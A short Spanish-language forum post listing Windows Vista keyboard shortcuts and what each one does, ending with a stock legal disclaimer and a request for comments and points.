en Windows Vista Alt + Tab = Combinación para cambiar entre las distintas ventanas que tengamos abiertas. Ctrl + Alt + Tab = Hace lo mismo que Alt + Tab pero si soltamos las teclas no se cerrara la ventana. Ctrl + Alt + Supr = Abre una ventana desde la que podemos, bloquear el equipo, cambiar de usuario, cerrar sesión, cambiar una contraseña e iniciar el administrador de tareas. Ctrl + Mayúsculas + Esc = Abre el administrador de tareas de Windows. Ctrl + Mayúsculas + Enter = Abre un programa como administrador. Win = Abre el menú de inicio. Win + F1 = Abre la ayuda de Windows. Win + 1 = Lanza la primera aplicación de la barra de inicio rápido, cambiando el numero 1 por el numero 2 abrirá la segunda aplicación de la barra de inicio rápido y así sucesivamente con todas las aplicaciones que tengamos en el menú. Win + Tab = Activa el Flip 3D con el que movernos entre las ventanas viendo una vista previa. Cada pulsación sobre Tab que hagamos (manteniendo Win pulsada) cambiará a la siguiente ventana y al soltar, la ventana seleccionada se mostrará en el frente. Ctrl + Win + Tab = Mantiene el Flip 3D después de liberar las teclas y podemos movernos entre las ventanas con las teclas de cursor. Win + Espacio = Trae al frente la barra lateral. Win + Pausa = Abre la sección de Sistema del panel de control. Win + D = Muestra el escritorio, si volvemos a usarlo vuelve a su estado anterior. Win + E = Abre el explorador de Windows. Win + F = Abre el diálogo de búsqueda. Win + G = Permite cambiar el foco entre los gadgets de la barra lateral. Win + L = Bloquea el equipo. Win + M = Minimizar todas las ventanas. Mayúsculas + Win + M = Permite restaurar todas las ventanas. Win + R = Abre el diálogo Ejecutar. Win + T = Pone el foco en la barra de tareas, con la versión minimizada de la ventana activa seleccionada, mostrando la vista previa de la ventana. Podemos movernos entre las distintas ventanas pulsando de nuevo Win + T, o pulsando T sin soltar Win, o con las teclas de cursor. Win + U = Centro de accesibilidad. Win + X = Centro de movilidad de Windows. bueno espero les sirva y ojo otra ves solo es una fuente de informacion y educacion y no me ago responsable del mal uso de esta, ya que es ilegal espero comenten y deje puntos para seguir posteando.